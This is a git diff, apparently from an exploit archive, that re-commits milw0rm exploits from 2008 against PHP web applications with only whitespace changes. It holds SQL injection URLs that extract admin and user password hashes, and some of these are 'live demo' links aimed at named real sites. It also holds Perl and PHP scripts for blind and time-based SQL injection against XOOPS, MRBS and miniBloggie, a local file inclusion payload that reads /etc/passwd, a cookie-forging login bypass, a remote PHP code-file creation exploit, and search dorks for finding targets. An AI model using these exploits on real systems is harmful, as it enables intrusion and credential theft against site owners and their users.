diff --git a/platforms/php/webapps/6770.txt b/platforms/php/webapps/6770.txt
index b4e42ceec..62b05930e 100755
--- a/platforms/php/webapps/6770.txt
+++ b/platforms/php/webapps/6770.txt
@@ -1,17 +1,17 @@
-::::::::::::::::::::R3AL.RU::::::::::::::::::::
-
-PHP Easy Downloader <= 1.5 Remote File Download
-
-Author: LMaster
-
-Greetz: Pogozheva Irina Borisovna and r3al.ru
-
-Download:
-
-http://www.hasemithut.de/downloads/index.php
-
-Exploit:
-
-http://www.target.com/phpeasydownloader/index.php?file=index.php
-
-# milw0rm.com [2008-10-16]
+::::::::::::::::::::R3AL.RU::::::::::::::::::::
+
+PHP Easy Downloader <= 1.5 Remote File Download
+
+Author: LMaster
+
+Greetz: Pogozheva Irina Borisovna and r3al.ru
+
+Download:
+
+http://www.hasemithut.de/downloads/index.php
+
+Exploit:
+
+http://www.target.com/phpeasydownloader/index.php?file=index.php
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6772.txt b/platforms/php/webapps/6772.txt
index 2ce30dd6c..877ce9e61 100755
--- a/platforms/php/webapps/6772.txt
+++ b/platforms/php/webapps/6772.txt
@@ -1,31 +1,31 @@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-Software : Post Affiliate Pro v2.0
-Vulnrability : Local File Inclusion
-Severity : High
-
-Author : ZeN
-Date : 16 October 2008
-
-Websites >
-http://DUSecurity.com
-http://DarkCode.me
-
-PS : You MUST be logged into the system for the exploit to work.
-
-Exploit >
-
-http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00
-
-
-Shouts>
-DUSecurity Group
-DarkCode
-WL-Group
-IWannaHack
-Milw0rm
-EnigmaGroup
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-# milw0rm.com [2008-10-16]
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Software : Post Affiliate Pro v2.0
+Vulnrability : Local File Inclusion
+Severity : High
+
+Author : ZeN
+Date : 16 October 2008
+
+Websites >
+http://DUSecurity.com
+http://DarkCode.me
+
+PS : You MUST be logged into the system for the exploit to work.
+
+Exploit >
+
+http://site.com/affiliates/index.php?md=../../../../../../../etc/passwd%00
+
+
+Shouts>
+DUSecurity Group
+DarkCode
+WL-Group
+IWannaHack
+Milw0rm
+EnigmaGroup
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+# milw0rm.com [2008-10-16]
diff --git a/platforms/php/webapps/6777.txt b/platforms/php/webapps/6777.txt
index 2df2d0890..dd0f1963e 100755
--- a/platforms/php/webapps/6777.txt
+++ b/platforms/php/webapps/6777.txt
@@ -1,52 +1,52 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
-#        and all darkc0de and DarkTrix members               ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com & darktrix.info
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title:  WordPress stnl_iframe remote sql injection vulnerability
-# 
-#
-###########################################################
-#
-# d0rk: ''stnl_iframe''
-#
-###########################################################
- 
-     POC :- 
-	
-	wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
-   
-     Live Demo: 
-	
-	http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
-
-
-###########################################################
-#
-#  Bug discovered : 18 Oct 2008
-###########################################################
-
-# milw0rm.com [2008-10-17]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
+#        and all darkc0de and DarkTrix members               ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com & darktrix.info
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title:  WordPress stnl_iframe remote sql injection vulnerability
+# 
+#
+###########################################################
+#
+# d0rk: ''stnl_iframe''
+#
+###########################################################
+ 
+     POC :- 
+	
+	wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
+   
+     Live Demo: 
+	
+	http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
+
+
+###########################################################
+#
+#  Bug discovered : 18 Oct 2008
+###########################################################
+
+# milw0rm.com [2008-10-17]
diff --git a/platforms/php/webapps/6778.pl b/platforms/php/webapps/6778.pl
index 9f22dd2a1..ab6fcd242 100755
--- a/platforms/php/webapps/6778.pl
+++ b/platforms/php/webapps/6778.pl
@@ -1,45 +1,45 @@
-#!/usr/bin/perl -w
- 
- 
-#Xoops GesGaleri Sql injection#
-########################################
-#[~] Author :  EcHoLL
-#[~] www.warezturk.org www.tahribat.com
-#[~] Greetz : Black_label TURK Godlike
- 
-#[!] Module_Name:  GesGaleri
-#[!] Script_Name:  XOOPS
-#[!] Google_Dork:  inurl:"/modules/GesGaleri/"
-########################################
- 
- 
-system("color FF0000");
-system("Nohacking");
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t|                 Turkish Securtiy Team                      |\n\n";
-print "\t\t-------------------------------------------------------------\n\n";
-print "\t\t|XOOPS Module GesGaleri(index.php kategorino)Remote SQL Injection Vuln|\n\n";
-print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
-print "\t\t-------------------------------------------------------------\n\n";
- 
-use LWP::UserAgent;
- 
-print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
- chomp(my $target=);
- 
-$column_name="concat(uname,0x3a,pass)";
-$table_name="xoops_users";
- 
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
- 
-$host = $target .   "/modules/GesGaleri/index.php?kategorino=5&no=15+union+select+1,2,".$column_name."+from/**/".$table_name."--";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
-  print "\n[+] Admin Hash : $1\n\n";
-  print "#   Tebrikler Exploit Calisti!  #\n\n";
-}
-else{print "\n[-] Exploit Bulunamadı...\n";
-} 
-
-# milw0rm.com [2008-10-18]
+#!/usr/bin/perl -w
+ 
+ 
+#Xoops GesGaleri Sql injection#
+########################################
+#[~] Author :  EcHoLL
+#[~] www.warezturk.org www.tahribat.com
+#[~] Greetz : Black_label TURK Godlike
+ 
+#[!] Module_Name:  GesGaleri
+#[!] Script_Name:  XOOPS
+#[!] Google_Dork:  inurl:"/modules/GesGaleri/"
+########################################
+ 
+ 
+system("color FF0000");
+system("Nohacking");
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t|                 Turkish Securtiy Team                      |\n\n";
+print "\t\t-------------------------------------------------------------\n\n";
+print "\t\t|XOOPS Module GesGaleri(index.php kategorino)Remote SQL Injection Vuln|\n\n";
+print "\t\t|   Coded by: EcHoLL     www.warezturk.org               |\n\n";
+print "\t\t-------------------------------------------------------------\n\n";
+ 
+use LWP::UserAgent;
+ 
+print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
+ chomp(my $target=);
+ 
+$column_name="concat(uname,0x3a,pass)";
+$table_name="xoops_users";
+ 
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+ 
+$host = $target .   "/modules/GesGaleri/index.php?kategorino=5&no=15+union+select+1,2,".$column_name."+from/**/".$table_name."--";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
+  print "\n[+] Admin Hash : $1\n\n";
+  print "#   Tebrikler Exploit Calisti!  #\n\n";
+}
+else{print "\n[-] Exploit Bulunamadı...\n";
+} 
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6779.txt b/platforms/php/webapps/6779.txt
index d2cca5cb6..a23b69a07 100755
--- a/platforms/php/webapps/6779.txt
+++ b/platforms/php/webapps/6779.txt
@@ -1,21 +1,21 @@
-#################################################
-##	Qabandi 	iqa[at]hotmail.fr      ##
-##		from Kuwait		       ##
-#################################################
-\\	phpFastNews
-//	 Insecure cookie handling
-\\
-//   Go to any website that has the script installed
-\\	type the following code into the Adress Bar
-//
-\\	javascript:document.cookie = "fn-loggedin = 1";
-//
-\\	Refresh do whatever, and you will be logged in
-//
-\\		Dork:intext:"Powered by phpFastNews"
-#################################################
-##	Greetz: Killer Hack, Str0ke	       ##
-#################################################
-		PEACE
-
-# milw0rm.com [2008-10-18]
+#################################################
+##	Qabandi 	iqa[at]hotmail.fr      ##
+##		from Kuwait		       ##
+#################################################
+\\	phpFastNews
+//	 Insecure cookie handling
+\\
+//   Go to any website that has the script installed
+\\	type the following code into the Adress Bar
+//
+\\	javascript:document.cookie = "fn-loggedin = 1";
+//
+\\	Refresh do whatever, and you will be logged in
+//
+\\		Dork:intext:"Powered by phpFastNews"
+#################################################
+##	Greetz: Killer Hack, Str0ke	       ##
+#################################################
+		PEACE
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6780.txt b/platforms/php/webapps/6780.txt
index 3355a61aa..cb52eb100 100755
--- a/platforms/php/webapps/6780.txt
+++ b/platforms/php/webapps/6780.txt
@@ -1,47 +1,47 @@
-|___________________________________________________|
-| zeeproperty (adid) Remote SQL Injection Vulnerability
-|___________________________________________________
-|----------------------  Hussin X  -------------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM   |  WwW.TrYaG.CC
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                     |
-| script    :  http://www.zeeproperty.com
-|
-| DorK   :  :)
-|___________________________________________________|
-
-Exploit:
-________
-
-www.[target].com/Script/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--
-
-
-Demo
-________
-
-www.zeeproperty.com/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--
-
-
-Admin Panel :
-________
-
-www.[target].com/Script/admin
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-                                               Im IRAQi    |     Im TrYaGi
-
-# milw0rm.com [2008-10-18]
+|___________________________________________________|
+| zeeproperty (adid) Remote SQL Injection Vulnerability
+|___________________________________________________
+|----------------------  Hussin X  -------------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM   |  WwW.TrYaG.CC
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                     |
+| script    :  http://www.zeeproperty.com
+|
+| DorK   :  :)
+|___________________________________________________|
+
+Exploit:
+________
+
+www.[target].com/Script/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--
+
+
+Demo
+________
+
+www.zeeproperty.com/bannerclick.php?adid=-1+union+select+0,0,concat(name,0x3e,pwd),0,0,0,0,0,0,0+from+admin--
+
+
+Admin Panel :
+________
+
+www.[target].com/Script/admin
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+                                               Im IRAQi    |     Im TrYaGi
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6781.pl b/platforms/php/webapps/6781.pl
index a7a7d07a8..32a16813a 100755
--- a/platforms/php/webapps/6781.pl
+++ b/platforms/php/webapps/6781.pl
@@ -1,64 +1,64 @@
-# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)".
-
-# Web CMS: http://sourceforge.net/projects/mrbs/
-# Affected: Previous versions of mrbs 1.4
-# Solution: Update to Version 1.4
-
-# Doorks:
-# "Meeting Room Booking System" "month.php?area="
-# "Meeting Room Booking System" "day.php?area="
-# "Meeting Room Booking System" "week.php?area="
-
-# Author: Xianur0
-# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0
-
-# Exploit:
-
-#!/usr/bin/perl
-
-#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()'
-#
-#Exploit MRBS By Xianur0
-#
-#Please Have Patience, The Blind SQL Injection is running.........
-#pma@localhost
-#
-#
-#Finished!
-#
-
-
-# By Xianur0
-
-  use LWP::UserAgent;
-
-%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z");
-
-  $ua = LWP::UserAgent->new;
-  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
-$url = $ARGV[0];
-$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
-print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n";
-$caracter = 1;
-$i=0;
-$detector = '
    No rooms defined for this area
    ';
-$simbolo = ">";
-while($caracter ne "finito") {
-  $req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i);
-  $req->header('Accept' => 'text/html');
-  $res = $ua->request($req);
-  if ($res->is_success) {
-     if($res->content !~ $detector) {
-if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";}
-$base = $i;
-$i = $i+10;
-} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
-}
-  } else {
-     print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
-  }
-}
-
-print "\nFinished!\n";
-
-# milw0rm.com [2008-10-18]
+# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)".
+
+# Web CMS: http://sourceforge.net/projects/mrbs/
+# Affected: Previous versions of mrbs 1.4
+# Solution: Update to Version 1.4
+
+# Doorks:
+# "Meeting Room Booking System" "month.php?area="
+# "Meeting Room Booking System" "day.php?area="
+# "Meeting Room Booking System" "week.php?area="
+
+# Author: Xianur0
+# Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0
+
+# Exploit:
+
+#!/usr/bin/perl
+
+#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()'
+#
+#Exploit MRBS By Xianur0
+#
+#Please Have Patience, The Blind SQL Injection is running.........
+#pma@localhost
+#
+#
+#Finished!
+#
+
+
+# By Xianur0
+
+  use LWP::UserAgent;
+
+%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z");
+
+  $ua = LWP::UserAgent->new;
+  $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
+$url = $ARGV[0];
+$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
+print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n";
+$caracter = 1;
+$i=0;
+$detector = '
    No rooms defined for this area
    ';
+$simbolo = ">";
+while($caracter ne "finito") {
+  $req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i);
+  $req->header('Accept' => 'text/html');
+  $res = $ua->request($req);
+  if ($res->is_success) {
+     if($res->content !~ $detector) {
+if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";}
+$base = $i;
+$i = $i+10;
+} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
+}
+  } else {
+     print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
+  }
+}
+
+print "\nFinished!\n";
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6782.php b/platforms/php/webapps/6782.php
index 887fd246b..ce49a92f7 100755
--- a/platforms/php/webapps/6782.php
+++ b/platforms/php/webapps/6782.php
@@ -1,125 +1,125 @@
-#!/usr/bin/php 
- StAkeR aka athos - StAkeR[at]hotmail[dot]it
-   Date   -> 18/10/2008
-   Get    -> http://www.mywebland.com/dl.php?id=2
-   ------------------------------------------------------------
-   
-   File del.php
-   
-   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
-   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
-   27.
-   28. if ($confirm=="") {   
-   29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
-   30. }
-   31. elseif ($confirm=="yes") {
-   32. // Data Base Connection  //
-   33. dbConnect();
-   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
-   35. $query = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error());
-   36. $confirm ="";
-   37. notice("Del Post", "Data Deleted");
-   38. }
-   39. else notice( "Delete Error, Unable to complete the task !" );
-   40. ?>
-
-   NOTE:
-   
-   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
-   
-   $post_id isn't escaped so you can execute SQL Code 
-   
-   How to fix? sanize $post_id with intval or int (PHP Functions)
-   
-  
-*/  
-
-
-
-function get($host,$path,$evil)
-{
-  if(!preg_match('/\w:[0-9]/i',$host)) alert();
-  $inet = explode(':',$host);
-
-  if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
-  
-  $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
-  $data .= "Host: $host[0]\r\n";
-  $data .= "User-Agent: Lynx (textmode)\r\n";
-  $data .= "Connection: close\r\n\r\n";
-  
-  fputs($sock,$data);
-  
-  while(!feof($sock)) { $html .= fgets($sock); }
-  fclose($sock);
-  
-  return $html;
-}
-
-
-function alert()
-{
-  echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
-  echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
-  echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
-  die;
-}
-
-
-function charme($char,$colum,$id)
-{
-  $sql = "1 or (select if((ascii(substring(password".
-         ",$colum,1))=$char),benchmark(200000000,char(0)),0)".
-         " from blogusername where id=$id)#";
-  
-  return urlencode($sql);
-}
-
-
-$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
-$c = 0;
-
-
-for($i=0;$i<=32;$i++)
-{
-  for($j=0;$j<=17;$j++)
-  {
-    $start = time();
-    
-    get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
-    
-    $stop = time();
-    
-    if($stop - $start > 12)
-    {
-      $password .= chr($hash[$j]);
-      $c++;;
-      break;
-    }
-  }
-}
-
-if(isset($password))
-{
-  echo "# Hash: $password\r\n";
-  die;
-}
-else
-{
-  echo "# Exploit Failed!\r\n";
-}
-    
-
-
-
-?>
-
-# milw0rm.com [2008-10-18]
+#!/usr/bin/php 
+ StAkeR aka athos - StAkeR[at]hotmail[dot]it
+   Date   -> 18/10/2008
+   Get    -> http://www.mywebland.com/dl.php?id=2
+   ------------------------------------------------------------
+   
+   File del.php
+   
+   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
+   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
+   27.
+   28. if ($confirm=="") {   
+   29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
+   30. }
+   31. elseif ($confirm=="yes") {
+   32. // Data Base Connection  //
+   33. dbConnect();
+   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
+   35. $query = mysql_query($sql) or die("Cannot query the database.
    " . mysql_error());
+   36. $confirm ="";
+   37. notice("Del Post", "Data Deleted");
+   38. }
+   39. else notice( "Delete Error, Unable to complete the task !" );
+   40. ?>
+
+   NOTE:
+   
+   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
+   
+   $post_id isn't escaped so you can execute SQL Code 
+   
+   How to fix? sanize $post_id with intval or int (PHP Functions)
+   
+  
+*/  
+
+
+
+function get($host,$path,$evil)
+{
+  if(!preg_match('/\w:[0-9]/i',$host)) alert();
+  $inet = explode(':',$host);
+
+  if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
+  
+  $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
+  $data .= "Host: $host[0]\r\n";
+  $data .= "User-Agent: Lynx (textmode)\r\n";
+  $data .= "Connection: close\r\n\r\n";
+  
+  fputs($sock,$data);
+  
+  while(!feof($sock)) { $html .= fgets($sock); }
+  fclose($sock);
+  
+  return $html;
+}
+
+
+function alert()
+{
+  echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
+  echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
+  echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
+  die;
+}
+
+
+function charme($char,$colum,$id)
+{
+  $sql = "1 or (select if((ascii(substring(password".
+         ",$colum,1))=$char),benchmark(200000000,char(0)),0)".
+         " from blogusername where id=$id)#";
+  
+  return urlencode($sql);
+}
+
+
+$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
+$c = 0;
+
+
+for($i=0;$i<=32;$i++)
+{
+  for($j=0;$j<=17;$j++)
+  {
+    $start = time();
+    
+    get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
+    
+    $stop = time();
+    
+    if($stop - $start > 12)
+    {
+      $password .= chr($hash[$j]);
+      $c++;;
+      break;
+    }
+  }
+}
+
+if(isset($password))
+{
+  echo "# Hash: $password\r\n";
+  die;
+}
+else
+{
+  echo "# Exploit Failed!\r\n";
+}
+    
+
+
+
+?>
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6784.pl b/platforms/php/webapps/6784.pl
index 60b6fceae..f03acaade 100755
--- a/platforms/php/webapps/6784.pl
+++ b/platforms/php/webapps/6784.pl
@@ -1,54 +1,54 @@
-#!/usr/bin/perl
-# --------------------------------------------------------
-# PHP Easy Downloader <= 1.5 Remote File Creation Exploit
-# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
-# On 17/10/2008
-# http://www.hasemithut.de/downloads/index.php
-# --------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my $host = shift(@ARGV);
-my $file = shift(@ARGV);
-my $http = new LWP::UserAgent;
-
-if($host !~ /^http:\/\/(.+?)$/ && $file !~ /(\w+)\.([a-zA-Z])?/)
-{
-  print "[?] PHP Easy Downloader <= 1.5 Remote File Creation Exploit\r\n";
-  print "[?] Usage: perl $0 http://[host] [filename]\r\n";
-  exit;
-}
-
-chomp(my $code = );
-
-if($code !~ /(<\?php|<\?#)(.*?)\?>/)
-{
-  print "[?] You must insert PHP Code\r\n";
-  exit;
-}
-  
-my $post = $http->post($host.'/file_info/admin/save.php',
-                       [
-                        filename    => $file,
-                        accesses    => $code.'//',
-                      ]); 
-
-if($post->is_success)
-{
-  if($post->as_string =~ /(Upload Date|Change Made!)/i)
-  {
-    print "[?] $host/file_info/descriptions/$file.0 Created\r\n";
-    exit;
-  }
-  else
-  {
-    print "[?] Exploit Failed!\r\n";
-    exit;
-  }
-} 
-
-
-__END__
-
-# milw0rm.com [2008-10-18]
+#!/usr/bin/perl
+# --------------------------------------------------------
+# PHP Easy Downloader <= 1.5 Remote File Creation Exploit
+# By StAkeR aka athos - StAkeR[at]hotmail[dot]it
+# On 17/10/2008
+# http://www.hasemithut.de/downloads/index.php
+# --------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my $host = shift(@ARGV);
+my $file = shift(@ARGV);
+my $http = new LWP::UserAgent;
+
+if($host !~ /^http:\/\/(.+?)$/ && $file !~ /(\w+)\.([a-zA-Z])?/)
+{
+  print "[?] PHP Easy Downloader <= 1.5 Remote File Creation Exploit\r\n";
+  print "[?] Usage: perl $0 http://[host] [filename]\r\n";
+  exit;
+}
+
+chomp(my $code = );
+
+if($code !~ /(<\?php|<\?#)(.*?)\?>/)
+{
+  print "[?] You must insert PHP Code\r\n";
+  exit;
+}
+  
+my $post = $http->post($host.'/file_info/admin/save.php',
+                       [
+                        filename    => $file,
+                        accesses    => $code.'//',
+                      ]); 
+
+if($post->is_success)
+{
+  if($post->as_string =~ /(Upload Date|Change Made!)/i)
+  {
+    print "[?] $host/file_info/descriptions/$file.0 Created\r\n";
+    exit;
+  }
+  else
+  {
+    print "[?] Exploit Failed!\r\n";
+    exit;
+  }
+} 
+
+
+__END__
+
+# milw0rm.com [2008-10-18]
diff --git a/platforms/php/webapps/6785.txt b/platforms/php/webapps/6785.txt
index eaf0bcb24..5c62f3302 100755
--- a/platforms/php/webapps/6785.txt
+++ b/platforms/php/webapps/6785.txt
@@ -1,44 +1,43 @@
-
-===========================================================================================
-
-
-  [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability
-
-       Software : Fast CLick SQL Lite version 1.1.7
-       Vendor   : http://www.ftrsoft.com/
-       Download : http://www.ftrsoft.com/downloads.html
-       Author   : NoGe
-       Contact  : noge[at]mainhack[dot]com
-
-
-===========================================================================================
-
-
-  [o] Vulnerable file
-
-       common/init.php
-
